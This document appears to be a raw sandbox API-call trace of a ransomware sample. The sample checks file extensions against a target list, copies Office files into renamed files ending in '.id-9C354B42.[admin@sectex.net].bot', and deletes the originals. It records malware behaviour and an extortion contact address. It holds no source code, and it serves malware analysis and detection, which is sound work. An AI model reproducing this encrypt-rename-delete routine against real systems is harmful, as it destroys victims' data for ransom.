	[0150.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL") returned 60
	[0150.518] lstrlenW (lpString=".dbf") returned 4
	[0150.518] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0150.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL") returned 60
	[0150.518] lstrlenW (lpString=".1cd") returned 4
	[0150.518] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0150.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SMIGRATE.VSL") returned 60
	[0150.518] lstrlenW (lpString=".jpg") returned 4
	[0150.518] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0150.518] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0150.518] lstrlenW (lpString="SOCIALCONNECTORRES.DLL") returned 22
	[0150.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SOCIALCONNECTORRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\socialconnectorres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.519] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=320928) returned 1
	[0150.520] CloseHandle (hObject=0x3d0) returned 1
	[0150.520] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SOCIALCONNECTORRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\socialconnectorres.dll")) returned 0x20
	[0150.520] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SOCIALCONNECTORRES.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\socialconnectorres.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SOCIALCONNECTORRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\socialconnectorres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0150.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SOCIALCONNECTORRES.DLL") returned 70
	[0150.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SOCIALCONNECTORRES.DLL") returned 70
	[0150.520] lstrlenW (lpString=".doc") returned 4
	[0150.520] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0150.520] lstrlenW (lpString=".docx") returned 5
	[0150.520] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0150.520] lstrlenW (lpString=".pdf") returned 4
	[0150.520] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0150.520] lstrlenW (lpString=".xls") returned 4
	[0150.520] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0150.520] lstrlenW (lpString=".xlsx") returned 5
	[0150.520] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0150.520] lstrlenW (lpString=".ppt") returned 4
	[0150.520] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0150.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SOCIALCONNECTORRES.DLL") returned 70
	[0150.520] lstrlenW (lpString=".zip") returned 4
	[0150.520] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0150.520] lstrlenW (lpString=".rar") returned 4
	[0150.521] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0150.521] lstrlenW (lpString=".bz2") returned 4
	[0150.521] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0150.521] lstrlenW (lpString=".7z") returned 3
	[0150.521] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SOCIALCONNECTORRES.DLL") returned 70
	[0150.521] lstrlenW (lpString=".dbf") returned 4
	[0150.521] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0150.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SOCIALCONNECTORRES.DLL") returned 70
	[0150.521] lstrlenW (lpString=".1cd") returned 4
	[0150.521] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0150.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SOCIALCONNECTORRES.DLL") returned 70
	[0150.521] lstrlenW (lpString=".jpg") returned 4
	[0150.521] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0150.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SOCIALCONNECTORRES.DLL") returned 70
	[0150.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SOCIALCONNECTORRES.DLL") returned 70
	[0150.521] lstrlenW (lpString=".doc") returned 4
	[0150.521] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0150.521] lstrlenW (lpString=".docx") returned 5
	[0150.521] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0150.521] lstrlenW (lpString=".pdf") returned 4
	[0150.521] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0150.521] lstrlenW (lpString=".xls") returned 4
	[0150.521] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0150.521] lstrlenW (lpString=".xlsx") returned 5
	[0150.521] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0150.521] lstrlenW (lpString=".ppt") returned 4
	[0150.521] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0150.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SOCIALCONNECTORRES.DLL") returned 70
	[0150.521] lstrlenW (lpString=".zip") returned 4
	[0150.522] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0150.522] lstrlenW (lpString=".rar") returned 4
	[0150.522] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0150.522] lstrlenW (lpString=".bz2") returned 4
	[0150.522] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0150.522] lstrlenW (lpString=".7z") returned 3
	[0150.522] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SOCIALCONNECTORRES.DLL") returned 70
	[0150.522] lstrlenW (lpString=".dbf") returned 4
	[0150.522] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0150.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SOCIALCONNECTORRES.DLL") returned 70
	[0150.522] lstrlenW (lpString=".1cd") returned 4
	[0150.522] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0150.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SOCIALCONNECTORRES.DLL") returned 70
	[0150.522] lstrlenW (lpString=".jpg") returned 4
	[0150.522] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0150.522] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0150.522] lstrlenW (lpString="SPACE.VRD") returned 9
	[0150.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\space.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.523] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1604) returned 1
	[0150.523] CloseHandle (hObject=0x3d0) returned 1
	[0150.523] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\space.vrd")) returned 0x20
	[0150.523] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\space.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\space.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.523] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.523] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\space.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0150.524] GetLastError () returned 0x0
	[0150.524] ReadFile (in: hFile=0x3d0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x644, lpOverlapped=0x0) returned 1
	[0150.526] WriteFile (in: hFile=0x1b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x650, lpOverlapped=0x0) returned 1
	[0150.526] ReadFile (in: hFile=0x3d0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.527] WriteFile (in: hFile=0x1b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0150.527] SetEndOfFile (hFile=0x1b8) returned 1
	[0150.527] CloseHandle (hObject=0x1b8) returned 1
	[0150.527] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.527] SetEndOfFile (hFile=0x3d0) returned 1
	[0150.529] CloseHandle (hObject=0x3d0) returned 1
	[0150.529] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.529] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\space.vrd")) returned 1
	[0150.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD") returned 57
	[0150.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD") returned 57
	[0150.530] lstrlenW (lpString=".doc") returned 4
	[0150.530] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0150.530] lstrlenW (lpString=".docx") returned 5
	[0150.530] lstrcmpiW (lpString1=".docx", lpString2="E.VRD") returned -1
	[0150.530] lstrlenW (lpString=".pdf") returned 4
	[0150.530] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0150.530] lstrlenW (lpString=".xls") returned 4
	[0150.530] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0150.530] lstrlenW (lpString=".xlsx") returned 5
	[0150.530] lstrcmpiW (lpString1=".xlsx", lpString2="E.VRD") returned -1
	[0150.530] lstrlenW (lpString=".ppt") returned 4
	[0150.530] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0150.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD") returned 57
	[0150.530] lstrlenW (lpString=".zip") returned 4
	[0150.530] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0150.530] lstrlenW (lpString=".rar") returned 4
	[0150.530] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0150.530] lstrlenW (lpString=".bz2") returned 4
	[0150.530] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0150.530] lstrlenW (lpString=".7z") returned 3
	[0150.530] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0150.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD") returned 57
	[0150.531] lstrlenW (lpString=".dbf") returned 4
	[0150.531] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0150.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD") returned 57
	[0150.531] lstrlenW (lpString=".1cd") returned 4
	[0150.531] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0150.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD") returned 57
	[0150.531] lstrlenW (lpString=".jpg") returned 4
	[0150.531] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0150.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD") returned 57
	[0150.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD") returned 57
	[0150.531] lstrlenW (lpString=".doc") returned 4
	[0150.531] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0150.531] lstrlenW (lpString=".docx") returned 5
	[0150.531] lstrcmpiW (lpString1=".docx", lpString2="E.VRD") returned -1
	[0150.531] lstrlenW (lpString=".pdf") returned 4
	[0150.531] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0150.531] lstrlenW (lpString=".xls") returned 4
	[0150.531] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0150.531] lstrlenW (lpString=".xlsx") returned 5
	[0150.531] lstrcmpiW (lpString1=".xlsx", lpString2="E.VRD") returned -1
	[0150.531] lstrlenW (lpString=".ppt") returned 4
	[0150.531] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0150.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD") returned 57
	[0150.531] lstrlenW (lpString=".zip") returned 4
	[0150.532] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0150.532] lstrlenW (lpString=".rar") returned 4
	[0150.532] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0150.532] lstrlenW (lpString=".bz2") returned 4
	[0150.532] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0150.532] lstrlenW (lpString=".7z") returned 3
	[0150.532] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0150.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD") returned 57
	[0150.532] lstrlenW (lpString=".dbf") returned 4
	[0150.532] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0150.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD") returned 57
	[0150.532] lstrlenW (lpString=".1cd") returned 4
	[0150.532] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0150.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SPACE.VRD") returned 57
	[0150.532] lstrlenW (lpString=".jpg") returned 4
	[0150.532] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0150.532] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0150.532] lstrlenW (lpString="STSLISTI.DLL") returned 12
	[0150.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLISTI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\stslisti.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.696] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=88464) returned 1
	[0152.740] CloseHandle (hObject=0x2a0) returned 1
	[0152.740] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLISTI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\stslisti.dll")) returned 0x20
	[0152.741] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLISTI.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\stslisti.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLISTI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\stslisti.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0152.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLISTI.DLL") returned 60
	[0152.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLISTI.DLL") returned 60
	[0152.763] lstrlenW (lpString=".doc") returned 4
	[0152.763] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0152.763] lstrlenW (lpString=".docx") returned 5
	[0152.763] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1
	[0152.763] lstrlenW (lpString=".pdf") returned 4
	[0152.763] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0152.763] lstrlenW (lpString=".xls") returned 4
	[0152.763] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0152.763] lstrlenW (lpString=".xlsx") returned 5
	[0152.763] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1
	[0152.763] lstrlenW (lpString=".ppt") returned 4
	[0152.763] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0152.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLISTI.DLL") returned 60
	[0152.763] lstrlenW (lpString=".zip") returned 4
	[0152.763] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0152.763] lstrlenW (lpString=".rar") returned 4
	[0152.763] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0152.763] lstrlenW (lpString=".bz2") returned 4
	[0152.763] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0152.763] lstrlenW (lpString=".7z") returned 3
	[0152.763] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0152.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLISTI.DLL") returned 60
	[0152.763] lstrlenW (lpString=".dbf") returned 4
	[0152.763] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0152.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLISTI.DLL") returned 60
	[0152.763] lstrlenW (lpString=".1cd") returned 4
	[0152.763] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0152.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLISTI.DLL") returned 60
	[0152.763] lstrlenW (lpString=".jpg") returned 4
	[0152.763] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0152.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLISTI.DLL") returned 60
	[0152.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLISTI.DLL") returned 60
	[0152.764] lstrlenW (lpString=".doc") returned 4
	[0152.764] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0152.764] lstrlenW (lpString=".docx") returned 5
	[0152.764] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1
	[0152.764] lstrlenW (lpString=".pdf") returned 4
	[0152.764] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0152.764] lstrlenW (lpString=".xls") returned 4
	[0152.764] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0152.764] lstrlenW (lpString=".xlsx") returned 5
	[0152.764] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1
	[0152.764] lstrlenW (lpString=".ppt") returned 4
	[0152.764] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0152.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLISTI.DLL") returned 60
	[0152.764] lstrlenW (lpString=".zip") returned 4
	[0152.764] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0152.764] lstrlenW (lpString=".rar") returned 4
	[0152.764] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0152.764] lstrlenW (lpString=".bz2") returned 4
	[0152.764] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0152.764] lstrlenW (lpString=".7z") returned 3
	[0152.764] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0152.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLISTI.DLL") returned 60
	[0152.764] lstrlenW (lpString=".dbf") returned 4
	[0152.764] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0152.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLISTI.DLL") returned 60
	[0152.764] lstrlenW (lpString=".1cd") returned 4
	[0152.764] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0152.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\STSLISTI.DLL") returned 60
	[0152.764] lstrlenW (lpString=".jpg") returned 4
	[0152.765] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0152.765] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0152.765] lstrlenW (lpString="VISIO.SHAPESHEET_COL.HXC") returned 24
	[0152.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.765] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=676) returned 1
	[0152.765] CloseHandle (hObject=0x2a0) returned 1
	[0152.765] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_col.hxc")) returned 0x20
	[0152.766] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.766] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.766] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0152.767] GetLastError () returned 0x0
	[0152.767] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x2a4, lpOverlapped=0x0) returned 1
	[0152.769] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x2b0, lpOverlapped=0x0) returned 1
	[0152.770] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.770] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x104, lpOverlapped=0x0) returned 1
	[0152.770] SetEndOfFile (hFile=0x384) returned 1
	[0152.770] CloseHandle (hObject=0x384) returned 1
	[0152.770] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.770] SetEndOfFile (hFile=0x2a0) returned 1
	[0152.772] CloseHandle (hObject=0x2a0) returned 1
	[0152.772] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.773] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_col.hxc")) returned 1
	[0152.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC") returned 72
	[0152.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_COL.HXC") returned 72
	[0152.773] lstrlenW (lpString=".doc") returned 4
	[0152.773] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0152.773] lstrlenW (lpString=".docx") returned 5
	[0152.774] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0152.774] lstrlenW (lpString=".pdf") returned 4
	[0152.774] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0152.774] lstrlenW (lpString=".xls") returned 4
	[0152.774] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0152.774] lstrlenW (lpString=".xlsx") returned 5
	[0152.774] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0152.774] lstrlenW (lpString=".ppt") returned 4
	[0152.774] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
